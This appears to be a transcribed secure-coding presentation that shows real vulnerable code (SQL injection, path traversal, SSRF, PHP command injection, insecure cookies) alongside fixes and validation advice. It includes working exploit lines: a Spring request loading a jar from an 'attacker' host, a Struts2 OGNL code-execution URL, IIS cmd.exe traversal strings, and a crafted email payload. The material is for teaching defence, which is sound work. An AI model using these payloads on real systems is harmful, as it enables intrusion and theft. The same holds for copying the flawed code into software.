Don't Try This At Home


DON'T TRY THIS AT HOME

Some of the code examples in this presentation may shock even the strongest of developers. If you are faint of heart, or don’t like a good laugh, then it may pay to leave the room...... No really...

All Languages Can Lead To Security Vulnerabilities

JAVA, PHP, ASP, C#, VB.Net, PERL, PYTHON, FLASH, C, C++, CFML

Security Vulnerability

Arbitrary Graph Of Statistics Of Vulnerabilities

3rd Hit Is A Vulnerability In A Graph Application, And It's SQL Injection. Have I Mentioned 2010 Yet?

Arbitrary Graph Of Statistics Of Vulnerabilities

http://www.cenzic.com/downloads/Cenzic_AppsecTrends_Q3-Q4-2009.pdf


Huh?


Apologies: the code you are about to see comes from real applications; only the variable names have been changed to protect the guilty.

If this code resembles yours, you may want to take notes...

What's Wrong With This Picture

Data Access Through Framework

    if (!string.IsNullOrEmpty(Request.QueryString["Eid"]))
        // the raw query-string value is concatenated straight into the SQL condition
        CMSMain.WhereCondition =
            "TitleID IN (SELECT TitleID FROM CMS_Documents WHERE EID = "
            + Request.QueryString["Eid"] + ")";

Frameworks Don’t Always Protect You

Frameworks Segway....

Framework Bugs: Spring Framework

Spring Framework execution of arbitrary code
http://blog.o0o.nu/2010/06/cve-2010-1622.html

Any Form Controller

    POST /adduser HTTP/1.0
    ...
    class.classLoader.URLs[0]=jar:http://attacker/spring-exploit.jar!/

Overwrite The WebappClassLoader URL With An Arbitrary Remote Jar

Framework Bugs: Struts2/XWork Framework

Struts2 Framework execution of arbitrary code
http://blog.o0o.nu/2010/07/cve-2010-1870-struts2xwork-remote.html

    http://mydomain/MyStruts.action?
    ('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true
    &(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))
    &(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

Execute Arbitrary Java Code

"Let's make a list..." OWASP Top 10

Trusting Filenames From The User

Image Loader: called via pages to display images, passed an image name in the URL

    public void ProcessRequest(HttpContext context)
    {
        string ImageUrl = context.Request.QueryString["ImageUrl"];
        ...
        // the user-supplied path is written straight back to the response
        context.Response.WriteFile(ImageUrl);
    }

Retrieve Arbitrary File From Server

Trusting URLs From The User

Help System Page Loader: called to load help contents from another server, passed a page reference in the URL

    public byte[] GetBytesFromUrl(string url)
    {
        // the request target is whatever the user put in the URL
        HttpWebRequest webRequest = (HttpWebRequest)WebRequest.Create(url);
        var webResponse = webRequest.GetResponse();
        using (var responseStream = webResponse.GetResponseStream())
        {
            return responseStream.ToBytes();   // ToBytes(): project extension method
        }
    }

Make Internal Network Requests

Using 302 Redirect As Security Measure

Making an unauthenticated request results in a 302 redirect to the login page:

    HTTP/1.1 302 Found
    Location: /admin/login
    Content-Type: text/html; charset=utf-8
    Content-Length: 13226

That Seems Suspiciously Large

    Object moved
    Object moved to here.

Using 302 Redirect As Security Measure

    HTTP/1.1 302 Found
    Location: /admin/login
    Content-Type: text/html; charset=utf-8
    Content-Length: 13226

    Object moved
    Object moved to

Oh there it is.

    href="/admin/login">here.

File Upload

Things that work

Things that DO NOT work

Posting the CAPTCHA answer and response:

    POST /captcha HTTP/1.0
    answer=kbpsh&response=kbpsh....

Posting the CAPTCHA 'id' and response

Using HTML to display the CAPTCHA 'word':

    Please type in these letters: kbpsh

Using HTML to display a mathematical equation to solve

Shopping Cart Troubles

Usual Shopping Process

My Shopping Process: Add To Cart Contents After Payment Processed

Flash Accepts User Input

Image Loader: Flash loaded by HTML page, HTML page sets parameters (Can Be Set Via URL Parameters)

    private var imgPath:String = "http://localhost/sample.jpg";   // default
    // the 'img' flashvar, settable through URL parameters, overrides the default
    imgPath = this.loaderInfo.parameters.img;
    img_holder = new Image(imgPath);

Flash Movie Hosted On Your Site, Loading Images From Attacker's Site

Cross System Data Truncation

Forgotten Password Feature: page accepts an email address and checks it is valid

    strEmail = Request.Form("txtemail")
    If strEmail <> "" Then
        objQRY.ClearParameters
        objQRY.AddParameter "@email", trim(strEmail)
        ' calls a stored procedure
        set rsLogin = objQRY.ReturnRS("spUserMatch")
    End If

Calls A Stored Procedure

Stored procedure does a user lookup:

    CREATE PROCEDURE [dbo].[spUserMatch]
        @email varchar(100) = null
    ...

Truncates Input To 100 Characters

If user exists, send email with new password:

    Set Mailer = Server.CreateObject("SMTPsvg.Mailer")
    Mailer.Subject = "New Password"
    Mailer.BodyText = strBody
    ' the recipient is the original, untruncated form input
    Mailer.Recipient = strEmail

Attacker Receives Copy Of Email: the mailer uses the original input (non truncated): <100 spaces>;
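The truncation mismatch above, as an added Python model that is not part of the talk: a stand-in for spUserMatch truncates to varchar(100) and ignores trailing spaces the way SQL Server string comparison does, while the mailer delivers to every ';'-separated recipient. The user table, the mailer behaviour and the fixed handler are assumptions of this example.

```python
import re

VARCHAR_LEN = 100   # @email varchar(100) in spUserMatch

# Constructed stand-in for the user table: email -> stored record.
USERS = {"alice@example.com": {"id": 7, "email": "alice@example.com"}}

def sp_user_match(email):
    """Stand-in for the stored procedure. The parameter is silently
    truncated to varchar(100), and the string comparison ignores trailing
    spaces, so padding after a real address is invisible to the lookup."""
    return USERS.get(email[:VARCHAR_LEN].rstrip())

def deliver(recipient_field):
    """Stand-in for the mailer: a ';'-separated Recipient field is
    delivered to every address it contains."""
    return [r.strip() for r in recipient_field.split(";") if r.strip()]

def forgot_password_vulnerable(form_email):
    # Mirrors the ASP page: look up with the (truncated) value, but mail
    # to the original, untruncated form input.
    str_email = form_email.strip()
    if str_email and sp_user_match(str_email):
        return deliver(str_email)
    return []

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

def forgot_password_fixed(form_email):
    # Reject input that does not fit the column or is not one well-formed
    # address, and send to the address stored for the matched user, never
    # to the raw request value.
    str_email = form_email.strip()
    if len(str_email) > VARCHAR_LEN or not EMAIL_RE.fullmatch(str_email):
        return []
    user = sp_user_match(str_email)
    return deliver(user["email"]) if user else []

# Constructed attacker input: a real address, padded past the column
# length, followed by a second recipient.
CRAFTED = "alice@example.com" + " " * 100 + ";attacker@evil.example"
```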

Cookie Data Serialisation

Object serialised, Base64 encoded and stored as cookie:

    // create map
    java.util.HashMap map = new java.util.HashMap();
    map.put("UserId", UserId);
    map.put("email", email);
    // serialise the map into buffer
    java.io.ByteArrayOutputStream buffer = new java.io.ByteArrayOutputStream();
    new java.io.ObjectOutputStream(buffer).writeObject(map);
    // Serialise and B64 it
    String info = java.net.URLEncoder.encode(
        new String(org.apache.commons.codec.binary.Base64.encodeBase64(buffer.toByteArray()), "UTF-8"),
        "UTF-8");
    // Store it in cookie
    org.apache.cocoon.environment.http.HttpCookie cookie =
        new org.apache.cocoon.environment.http.HttpCookie("SESSION", info);

Cookie Data Serialisation: the object is stored insecurely in the cookie. Base64 is not encryption.

Cookie data can be decoded, modified, recoded and sent back. The application deserialises it and trusts it, and the attacker gains access as another UserID.
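The decode/modify/recode problem above, as an added Python example that is not from the talk: the unsigned reader accepts a re-encoded cookie, while a version with an HMAC-SHA256 tag over the payload rejects anything it did not issue. The demo key, the JSON payload (in place of Java object serialisation, which also removes deserialisation of arbitrary classes) and the function names are assumptions.

```python
import base64
import hashlib
import hmac
import json

TAG_LEN = 32
# Constructed demo key; a real deployment loads this from configuration.
SERVER_KEY = b"constructed-demo-key-not-for-production"

def encode_unsigned(user_id, email):
    """The page's pattern: serialise the map and Base64 it."""
    payload = json.dumps({"UserId": user_id, "email": email}, sort_keys=True).encode()
    return base64.urlsafe_b64encode(payload).decode()

def decode_unsigned(cookie):
    """Trusts whatever comes back, as the page's deserialiser does."""
    return json.loads(base64.urlsafe_b64decode(cookie))

def tamper(cookie, new_user_id):
    """Decode, modify, recode: the three steps the slide lists."""
    data = decode_unsigned(cookie)
    return encode_unsigned(new_user_id, data["email"])

def encode_signed(user_id, email):
    """Same Base64 transport, with an HMAC tag over the payload appended."""
    payload = json.dumps({"UserId": user_id, "email": email}, sort_keys=True).encode()
    tag = hmac.new(SERVER_KEY, payload, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(payload + tag).decode()

def decode_signed(cookie):
    """Verify the tag in constant time before parsing; None on any mismatch."""
    try:
        raw = base64.urlsafe_b64decode(cookie)
    except ValueError:
        return None
    payload, tag = raw[:-TAG_LEN], raw[-TAG_LEN:]
    expected = hmac.new(SERVER_KEY, payload, hashlib.sha256).digest()
    if len(tag) != TAG_LEN or not hmac.compare_digest(tag, expected):
        return None
    return json.loads(payload)
```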

Let's Not Leave Out PHP

Execute system() With User Supplied Input. This was for real.... in a 'security' appliance used by .mil

    if ($_GET["cmd"] == "TERMEND") {
        $sid = $_GET["param"];
        // $sid is interpolated, unescaped, into the shell command line
        $cmd = "/var/www/htdocs/utt/Queue.pl delete_message_queue $sid";
        system($cmd);
    }

Did I Mention That It Was Unauthenticated Access?

Cookies: Well, This Sure Looks Useful

    void CheckLoginCount()
    {
        // the attempt counter lives in a cookie the client controls
        HttpCookie cookie = Request.Cookies["LoginAttempts"];
        if (cookie != null)
        {
            int attempts = int.Parse(cookie.Value);
            if (attempts >= 5)
                Redirect("~/AccessDenied.aspx");
        }
    }

More Cookies: Remember Me Functionality

User selects remember me. Application generates a random token and stores it in the cookie and in the database:

    $token = substr(md5(uniqid(rand(), true)), 0, 49 - strlen($this->ID));
    $this->RememberLoginToken = $token;
    Cookie::set('rem_me', $this->ID . ':' . $token);

User selects logout. Application sets the token to null, storing null in the cookie and in the database:

    $this->RememberLoginToken = null;
    Cookie::set('rem_enc', null);

If the user doesn't logout they use the autologin feature. Application loads the user based on the cookie value and checks the tokens match:

    list($uid, $token) = explode(':', Cookie::get('rem_me'), 2);
    $a_uid = Convert::raw2sql($uid);
    $user = DataObject::get_one("User", "User.ID = '$a_uid'");
    // only rejects on mismatch: a null stored token loosely equals an empty $token
    if ($user && $user->RememberLoginToken != $token) {
        $user = null;
    }

What Happens If $token Is Empty (null)?
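The null-token case above, as an added Python model that is not from the talk: `php_ne` reproduces PHP's loose `!=` for a null/string pair, so the vulnerable port logs in on the cookie `7:` after logout, while the fixed version requires both tokens to be non-empty and compares them in constant time. The user table and function names are assumptions.

```python
import hmac
import secrets

# Constructed stand-in for the User table after user 7 logged out:
# the RememberLoginToken column is NULL.
USERS = {7: {"id": 7, "remember_login_token": None}}

def php_ne(a, b):
    """PHP's loose `!=` for a null/string pair: null is cast to '' first,
    so null != '' is false. This is the comparison the page's code relies on."""
    return ("" if a is None else a) != ("" if b is None else b)

def load_user(cookie):
    """Split 'uid:token' (explode with limit 2) and look the user up."""
    uid, _, token = cookie.partition(":")
    user = USERS.get(int(uid)) if uid.isdigit() else None
    return user, token

def autologin_vulnerable(cookie):
    # Mirrors the PHP: only reject when the tokens differ. After logout the
    # stored token is NULL and the cookie '7:' yields an empty token, which
    # the loose comparison treats as equal, so the user is logged in.
    user, token = load_user(cookie)
    if user and php_ne(user["remember_login_token"], token):
        user = None
    return user

def autologin_fixed(cookie):
    # Positive check: both sides must be non-empty and equal, compared in
    # constant time so the token cannot be guessed byte by byte.
    user, token = load_user(cookie)
    stored = user["remember_login_token"] if user else None
    if not stored or not token or not hmac.compare_digest(stored, token):
        return None
    return user

def issue_token(user):
    """Remember-me login: store a fresh random token and build the cookie."""
    user["remember_login_token"] = secrets.token_hex(24)
    return f"{user['id']}:{user['remember_login_token']}"
```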

Evil Users: Never Trust User Supplied Input

No really, users are evil. And hands leap out of Matrix style backgrounds.

Input Validation

Input Validation Is The Key (no, I didn't say 'silver bullet'). Properly implemented, it can prevent most application vulnerabilities.

Validate At Input: validate all input to ensure it conforms to the required format.

Validate All Input: text strings, cookie values, HTTP headers, file data, path names, URL values, currency, data from databases, 3rd parties, web services.

Client Side Validation: should only be used to reduce browser requests. Never rely on client side validation for security.

Backend Validation: validate the data and ensure the user is authorised to access the data records. It should not matter what values the user sends.

Data Normalisation

Data Comes In Many Forms:

    "this is data"
    %74%68%69%73%20%69%73%20%64%61%74%61
    this is 0;data
    "ThIs iS dAtA"

Many paths to the same location:

    /help.jsp?page=user/welcome.htm
    /help.jsp?page=user/../admin/welcome.htm
    /help.jsp?page=user\..\admin/welcome.htm
    /help.jsp?page=user\/\/..//\\/admin/welcome.htm
    /help.jsp?page=help.jsp

Data Decoding or Normalisation

Depending On Application: decode or reject.
Detect Encoded Data: decode the data and compare to the original.
Decode Recursively To Its Lowest Form: concatenation of paths, multiple layers of encoding.
Formalise Decoding Order: to prevent unintended decoding later in the application.

Data Decoding And Validation FAIL

MS Extended Unicode vulnerability:
    /scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
MS Double Decode vulnerability:
    /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
NGINX Source Code Disclosure:
    http://www.example.com/file.php%20
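The decode-to-lowest-form and validate-at-input points from the last two slides, as an added Python example that is not from the talk: it decodes repeatedly, counts encoding layers, rejects the overlong UTF-8 and double-encoded paths shown above, and confines the help page reference under a base directory. The `MAX_DECODE_ROUNDS` limit, the `user` base directory and the function names are assumptions.

```python
import posixpath
from urllib.parse import unquote_to_bytes

MAX_DECODE_ROUNDS = 3   # constructed limit; anything deeper is rejected

def decode_to_lowest_form(raw):
    """Percent-decode repeatedly until the value stops changing.
    Returns (bytes, rounds); rounds > 1 means the input was encoded more
    than once, which is the '..%255c' double-decode pattern."""
    current = raw.encode("utf-8")
    for rounds in range(MAX_DECODE_ROUNDS):
        decoded = unquote_to_bytes(current)
        if decoded == current:
            return current, rounds
        current = decoded
    raise ValueError("too many encoding layers")

def normalise_page(raw, base="user"):
    """Canonicalise a help page reference and confine it to `base`.
    Returns the canonical relative path, or None if the value is rejected."""
    try:
        data, rounds = decode_to_lowest_form(raw)
    except ValueError:
        return None
    if rounds > 1:
        return None                        # multiple encoding layers: reject
    try:
        text = data.decode("utf-8")        # strict: overlong '%c0%af' fails here
    except UnicodeDecodeError:
        return None
    if "\x00" in text or text != text.strip():
        return None                        # NUL bytes, or 'file.php%20' style padding
    text = text.replace("\\", "/")         # both separator styles mean the same thing
    canonical = posixpath.normpath(text)   # collapses '//', '.', and '..'
    if canonical.startswith("/") or not canonical.startswith(base + "/"):
        return None                        # escaped, or never entered, the base directory
    return canonical
```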

Conforms

Ensure Data Conforms To Required Format: check length, type, min() and max() values; alphanumeric only; must be a valid date.
Reject Bad Data: do not attempt to fix it up; that easily leads to confusion.
Use Data Whitelists: check against a list of known good values; it is easier to know which values are good input; the recommended approach.

Sanitise Data For Use

Data Will Be Used In Different Places: SQL, XML, output, log files. Each requires different sanitisation: remove meta characters, remove special characters, remove linefeeds.
Use Standard Formalised Reusable Code Blocks: most languages contain these; OWASP supplies some; homebrew code should be well tested and documented at the start of development.

When Filtering Goes Wrong

This Is Not Filtering:

    If (imageurl = "/web.config") exit()

And Yes, XSS without